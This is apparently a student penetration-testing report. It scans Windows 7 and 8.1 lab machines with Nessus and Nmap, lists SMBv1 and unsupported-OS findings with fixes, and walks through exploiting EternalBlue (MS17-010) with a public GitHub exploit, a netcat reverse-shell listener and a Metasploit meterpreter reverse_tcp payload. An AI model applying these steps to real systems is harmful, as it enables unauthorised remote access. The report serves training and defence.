Penetration Testing Report

Document details :
Completed on August 26 2023

Report Type Manual and Tools

Scanning with
Exploitation
Group Members :
Mashal Khan
Umar Khan
Khalil ur rehman
Atif
 Tables of Contents
1: Executive summary
1.1 : Scope of Testing
1.2 : Overview
1.3 : Recommendations

2: Network Scanning
2.1 : Nessus Scanning
2.2 : Nmap Scanning
2.3 : Critical Findings
2.4 : High Findings
2.5 : Medium Findings
2.6 : Low Findings

4: Exploitations
4.1 net cat
4.2 : Metasploit

5: Conclusion
5.1 : Summary of Findings
5.2 : Summary of Exploits

1.Executive Summary
In this report we tested the network
 to find how to secure our network . we will talk
about
what we did , what we found , and what we do to
safe
the network . but over report is not only for saftey
in
there we also know how to exploit that systems .

1.1 : Scope of Testing

In there we looked at the whole
network to find loop wholes , week points , and security
problems . how to fix that and how to exploit that .

1.2 : Overview
This report like is when we check a house
to make sure it safe from robbers . but there we also act
like robbers . first we find week points the system using
multiples tools through the scan and know about that
loop wholes . and how to exploit that Vulnerablities .

1.3 : Recommendations
in there we studied the problems
and find the best way to solve that’s problems . this
suggestions act like protector to protect your computers
from hackers .
2. Network Scanning
Network Scanning is like a
robber find windows and doors which is open and
robber get in the house easily . in computer world for
this process using special tools to find all the places
where network can be vulnrable . its like checking
unlock doors that hackers use to get in the computer .

2.1 : Nessus
Nessus is a very powerfull tools for
scanning network . in there we find that vulenrabilites
which attacker can use for exploit our system so in this
report for scanning we will use nessus tools.

Download link :
https://www.tenable.com/downloads/nessus?
loginAttempted=true
 Scan Window 8.1 with Nessus

2.2 : Critical and High Vulnerabilities

 There we scan the network so we find two type of

Vulnerabillities . Critical and High

1. Critical Vulnerability is SMBv1

 Smbv1 is network file sharing protocol . and it was

introduce by microsoft in 1980s as a way to allow
computers to share files and printers over the
network
 Smbv1 not very safe beacause hacker can easily
break in . and control your desktop remotly

Solution
if you want to solve this problem so turn of smbv1
and use smbv2 and smbv3 its much more safe than
smbv1 .
Second one is keep update your system . because its
fixing holes .

There only two vulnerabilities and 34 informations

about system .
 No High Vulnerability
 No Low Vulnerability
2.2: Scanning with Nmap
Nmap
Nmap is like a digital dedtictive for
computers networks . its special tool that investigates
and explore the networks to find out what devices are
there and whats services there are running.
In simple words nmap is a computer program that’s help
you to look at networks to see which devices are
connected and actually they are doing .
Now we start the scanning

I. First command is sudo nmap -p- (target ip)

This is the nmap command which we used for scanning

the network of target machine we use this command for
checking ports that which ports are open on target
machine
So you can see in the picture there are many ports are
open attackers mostly used 445/tcp port

445/tcp port is used for communication to send and

recive file and computers communicate with each other
so its important to keep it safe and secure .
II. The Second Commond is nmap script --vuln (target
ip)

This command we use for finding week points that

hacker can easily exploit the target machine . these
vulnerabilities are like open windows that hacker use to
get in

We have many methods to exploit windows for example

 Exploit with vulnerability

 Exploit with payloads

 Exploit with Netcat

4.Exploitation
So there we exploit windows 8.1 using Netcat and
MS17 -010 exploit code which is avaliable on github in
there we didn’t use Metasploit .we can exploit Eternal
blue Manaullay using code .
4.1 Net cat
Netcat is like a tool that computers talk to each
other over the network . it can help to send and recive
information between computers in different ways . it
very usefull for checking connections and transfering
files .

 So first of all open your kali linux terminal and write

this command .
git clone https://github.com/3ndG4me/AutoBlue-MS17-
010.git
 This command we use for cloning repostories of
github code
 After we give a command to enter in AutoBlue-Ms17-
010 folder which command is
$ cd AutoBlue-MS17-010
 In the next step we install the requirments which
command is $ pip install -r requirments.txt
 In the next step we enter in shell code folder

 In the next step we install the requirments which

command is $ pip install -r requirments.txt

 In the next step we enter in shell code folder

 In this stage we compaile a shell code for target
machine
 For giving permission we use this command
$ chmod +x shell_prep.sh
 Creating shell code command is
 $ ./shell_prep.sh

 A based on target system Architecture you can utalize

32bit kernel shell code or 64 bit kernel shell code
You can set your lhost and lport
 After complete this we sent that script to victm and
on our system we create a listner
 Listner command is $ nc -nvlp (port)

 When victm click on that file you will get access of

cmd

This is the access of cmd of victm system

 Windows 7

 Now we scan windows 7 using nessus and nmap and

after this process we will expolit windows 7 using
metasploit Tools

Already we was define what is nessus and from where

download so in there we start from scanning directly .
So lets go…

 So after all scan we find only two type vulnerabilities

One is Critical Vulnerabilities Which we found only
one vulnerability
 And second we found medium vulnerabilities which
count is one .
 Medium Vulnerability

This vulnerability related with SMB which we already

disscus in prevoius topics what is SMB so there I will give
a quick overview SMB is basically a transport protcol
computers communicate and share files with SMB .
Hackers can easily access exploit this types
vulnerabilities .

 Here are the relevant details:

1. Vulnerability name SMB signing not required
2. ID 57608
3. Version 1.20
4. Severity Medium
 Critical Vulnerability

 This Vulnerability name is Unsupported Windows OS

(remote)

 It means you are using a version of the windows

opreating System that is no longer been update like
windows 7 and 8 which are out date windows
opreating system . Mostly ogarnization using
windows 7 and 8 in this era due to some reasons
Like our BRT System Peshawar still using Windows 7.

Solution
 Keep update your windows opreating system

 Moved on new windows opreating system

 Now we scan this victm ip using nmap
In previous topics we alreay disscus in simple way
what is nmap and how its work so I will give you a quick
overview nmap is a very famous tool of linux which used
for scannig the network to investigate who are on the
network and whats are running on the network

In the very first we will check the open ports on the

network so first open your kali terminal and write this
command for scanning network checking ports
This command known as ping scan they scan all 65535
ports
$ nmap -p- (target ip)

 So you can see there are many ports are open but
 Mostly attackers use 445/tcp port which we already
disscus in previous topics what is 445/tcp port and
why hacker use this port
 So this is the result of nmap scanning

Now we scan for vulnerabilites so we use this command

$ nmap -A (target ip)

So there we find vulnerabilities using this command

 Metasploit

4.2 Metasploit
In simple words metasploit is like toolbox for
cyber security experts . they use this tools for find
vulnerabilities in computers and networks . hackers use
for exploit systems and other things . this tool use alos
ethical hackers for find vulnerabilities and to fix them.

To run in kali linux first open your kali linux terminal and
write this command $ msfconsole
After run the metasploit you can use for your problems
and situation

In there we search for exploits in metasploit have 2315

exploits so you can search for your problems so in there
we select MS17-010 Eternal blue SMB remote windows
So there we select number 0 exploit
Then use multi handler
After chossing the exploit then we check the options to
check what we required to set
So there we need set payload and setlhost and setlport

$ use multi/handler
$ set payload windows/meterpreter/reverse_tcp
$ setlhost = (local host)
$ setlport = (localport)
Now in this phase we create a session with victm system
for creating session we type exploit or run command

 So you can see we get a one meterpreter session

finally of windows 7 opreating system
 If you want to information of system so you run
sysinfo command in meterpreter .
 For grabbing first you run load esipa then you
write screebgrab command
 There are several commands that you can use for
your requirment .
5: Conclusion
In this report we was coverd what is
scanning how to scan network using nessus and nmap in
kali linux and cover all relevants topics breifly and we
also coverd how to exploit system and know about the
solutions of vulnerabilities how to fix this and how to
protect over system

5.1 : Summary of Findings

In this report we cover about scanning
that how to scan a network on nessus and which type
vulnerabilities exists on our systems we coverd about
critical vulnerabilities and how effected that
vulnerability our system and how to solve that
vulnerabilities as well as we coverd medium type
vulnerability which related with SMB . and aslo we
coverd nmap scanning how to scan full ports of the
network and how to find vulnerabilities .

5.2 : Summary of Exploits

in this report we was coverd
how to exploit a system so we exploit two type of
windows opreating systems one is windows 7 and
second one is windows 8 we exploits with two methods
one is net cat and other one is metasploit so we exploit
windows 7 with metasploit and windows 8 with net cat
and there we coverd every step with details how to
clone repositery of github how exploit with netcat and
how to run metasploit we coverd every basic point .